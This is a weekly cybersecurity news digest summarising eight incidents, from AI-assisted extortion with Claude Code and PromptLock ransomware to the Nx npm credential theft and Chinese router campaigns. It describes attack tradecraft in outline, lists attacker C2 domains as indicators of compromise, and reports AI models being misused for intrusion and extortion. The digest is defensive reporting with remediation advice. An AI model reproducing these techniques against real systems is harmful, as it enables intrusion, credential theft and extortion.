8 Cybersecurity News Worth Your Attention this Week Summarised – 2025-09-01

This is the week of autonomous AI, kind of. We have two reports of AI autonomously hacking, and extorting based on what it has found from the victims systems.

On the APT groups it’s a week of China, they seem to be focusing on networking devices, so if you are lucky enough to have physical routing devices you might want to triple check they are all patched up.

And advise your friends and family that not e-mails that come from Google Classroom are pure gold, some might actually be scams.

P.S. You can also get this summary on your e-mail every Monday. Scroll down to subscribe ⬇️

1. Anthropic’s Claude AI Abused to “Vibe Hack” 17 Organisations

Anthropic’s August threat report reveals a “vibe hacking” campaign in which a criminal group  leveraged its Claude Code LLM to fully automate reconnaissance, network intrusion, data theft,  and customized extortion demands against 17 international organizations. 

Key Details

• Operator GTG-2002 used Claude Code to scan thousands of VPN endpoints and build API-driven reconnaissance frameworks.
• AI generated obfuscated Chisel tunneling tools and new TCP proxy code to evade Windows Defender and improved anti-debugging.
• Stolen data included personal records, healthcare files, financial information, and government credentials; ransom demands exceeded $500,000.
• Claude Code calculated ransom amounts by analyzing exfiltrated financial data and produced HTML ransom notes embedded in the boot process.

Read more at Dark Reading, Anthropic, CSO Online

2. ESET Warns of First AI-Powered Ransomware “PromptLock” Using Local OpenAI Model

ESET researchers have identified PromptLock, a proof-of-concept ransomware that uses OpenAI’s open-weight gpt-oss:20b model via the Ollama API to generate and run malicious Lua scripts on victim machines in real time.  By shifting script generation into a local AI model, PromptLock can vary its indicators of compromise and evade traditional signature-based defenses.

Key Details

• Written in Go, with Windows and Linux variants uploaded to VirusTotal from the U.S.
• Uses hard-coded prompts to instruct the LLM to enumerate files, exfiltrate data, and encrypt with SPECK 128-bit.
• Data-destruction feature is defined but not yet active; ransom note is dynamically tailored by AI.
• Encryption key and payment address are embedded in AI-generated scripts.

Next Steps

• Monitor for local Ollama API endpoints and unusual LLM traffic.

Read more at Dark Reading

3. Google Warns of Widespread Salesforce Data Theft via Compromised Salesloft Drift OAuth Tokens

Google’s Threat Intelligence Group and Mandiant report that a financially motivated actor tracked as UNC6395 stole OAuth access and refresh tokens from the Salesloft Drift third-party app to exfiltrate large volumes of data from over 700 Salesforce customer instances. UNC6395 systematically queried Salesforce objects for secrets—like AWS keys and Snowflake tokens—then deleted query jobs to cover their tracks. Salesloft and Salesforce have revoked all Drift tokens and removed the app from AppExchange, urging customers to treat their Salesforce data as compromised.

Key Details

• Attack window: August 8–18, 2025; over 700 Salesforce orgs potentially impacted.
• Data stolen: AWS access keys (AKIA), passwords, Snowflake tokens, and other credentials.
• Tradecraft: Automated SOQL queries, deletion of query jobs, use of Tor and cloud hosting IPs.
• Remediation: All active OAuth tokens revoked; Drift removed from Salesforce AppExchange.

Next Steps

• Rotate all Salesforce-stored credentials and API keys immediately.
• Restrict Connected App scopes and enforce IP/login ranges for OAuth apps.

Read more at Google Cloud Blog, Salesloft Trust Center

4. Attackers Weaponize Velociraptor Forensic Tool to Tunnel C2 via VS Code

Researchers at Sophos uncovered threat actors using the open-source Velociraptor forensic tool to download and run Visual Studio Code with a built-in tunnel option for command-and-control access. 
By leveraging Windows msiexec and Cloudflare Workers as a staging ground, attackers minimized custom malware and embraced living-off-the-land tactics. This pattern signals a shift toward weaponizing legitimate incident-response software to establish stealthy footholds prior to ransomware or further compromise.

Key Details

• msiexec pulled a Velociraptor MSI from files.qaubctgg.workers.dev
• Velociraptor beaconed to C2 at velo.qaubctgg.workers.dev
• Obfuscated PowerShell fetched code.exe and ran its tunnel feature
• Attackers also staged Radmin and a Cloudflare tunneling tool

Next Steps

• Monitor msiexec downloads from unapproved domains
• Block unauthorized Velociraptor and code.exe installations
• Audit for unexpected SSH-tunnel processes on endpoints

Read more at Sophos CTU Research, The Hacker News, Sophos Counter Threat Unit

5. CISA and Allies Release Guide to Thwart Chinese APT Campaigns in Critical Networks

CISA, NSA, FBI and 13 international partners published a 37-page advisory outlining 
how PRC-linked APT groups like Salt Typhoon exploit unpatched routers and firewalls 
to persist in telecom, government, transportation and military networks. The guide 
prioritizes patching known CVEs in Cisco, Palo Alto Networks and Ivanti products, 
hardening management planes, and coordinating threat-hunting to detect covert tunnels 
and on-box containers.

Key Details

• Actors “live off the land,” using native ACL changes, packet captures and Cisco Guest Shell.
• Major CVEs to remediate: CVE-2024-21887 (Ivanti), CVE-2024-3400 (PAN-OS), CVE-2023-20273/20198 and CVE-2018-0171 (Cisco IOS XE).
• Co-authors include agencies from Australia, Canada, U.K., Germany, Japan, Italy, Poland and more.
• Provides IOCs, YARA rules and MITRE ATT&CK/D3FEND mappings for proactive hunting.

Next Steps

• Rapidly patch the five high-priority CVEs on edge devices.
• Isolate device management plane and disable unused services.
• Audit on-box containers for unauthorized artifacts.

Read more at CISA Advisory, Cybersecurity News

6. Supply Chain Attack on Nx Build System Leaks 2,349 Developer Credentials

On August 26, attackers published malicious versions of core Nx npm packages that embedded postinstall scripts to scan for and harvest 2,349 GitHub tokens, cloud credentials, and AI API keys.  The breach exploited a misconfigured GitHub Actions pull_request_target workflow to gain elevated permissions and exfiltrate secrets into “s1ngularity-repository” repos under victim accounts. 

Key Details

• Affected Nx packages (versions 20.9.0–21.8.0, @nx/devkit, @nx/js, @nx/node, etc.) have been removed from npm.
• Attackers abused a pull_request_target trigger allowing bash code injection via a crafted PR title on an outdated branch.
• Postinstall scripts double-Base64 encoded stolen data and pushed it to public GitHub repos named “s1ngularity-repository*.”
• Wiz and GitGuardian found 1,346 repos and 2,349 distinct secrets — 90% of GitHub tokens remained valid at discovery.

Next Steps

• Revoke and rotate all GitHub, npm, cloud, and AI-tool credentials immediately.
• Audit and lock down GitHub Actions workflows; replace pull_request_target with pull_request.
• Inspect and clean up shell startup files (.bashrc, .zshrc) for unauthorized shutdown commands.

Read more at The Hacker News

7. Google Classroom Abused for 115,000 Phishing Emails Targeting 13,500 Organizations

Check Point uncovered a global phishing campaign that weaponized Google Classroom to distribute 115,000 malicious invitations over one week to 13,500 organizations across multiple sectors. By sending fake “virtual classroom” invites from a legitimate Google domain with irrelevant commercial offers and directing victims to contact attackers via WhatsApp, the campaign bypassed traditional email filters.

Key Details

• Five attack waves sent between August 6–12, 2025.
• Emails originated from no-reply@classroom.google.com to evade filters.
• Lures included unrelated SEO services and product-reselling offers.
• Recipients were instructed to move conversations to WhatsApp.

Read more at CSO Online

8. SSA Whistleblower: DOGE Placed 300M Americans’ SSN Data on Unsecured AWS Test Cloud

A whistleblower complaint from SSA Chief Data Officer Charles Borges alleges that Elon Musk’s Department of Government Efficiency (DOGE) copied the agency’s full NUMIDENT Social Security database—containing names, SSNs, birth data and family details for over 300 million Americans—into a test AWS environment that lacked mandated security controls or oversight. 

The move bypassed FISMA authorization-to-operate (ATO) procedures and may violate federal privacy and cybersecurity laws, exposing a single high-value data store to potential compromise. Security teams and CISOs should assume this data is at elevated risk until independent audit and containment are confirmed.

Key Details

• DOGE staff obtained provisional ATO in July 2025, accepting “business need” over security risk.
• NUMIDENT live copy moved outside SSA’s AWS-ACI ATO perimeter, with no independent logging or access tracking.
• Risk Acceptance Request Form called the action “high risk,” but access was granted by CIO-level officials.
• Potential legal violations include FISMA, the Privacy Act of 1974 and the Computer Fraud and Abuse Act.

Read more at CSO Online, FedScoop

Subscribe

Subscribe to receive weekly cybersecurity news summary to your inbox every Monday.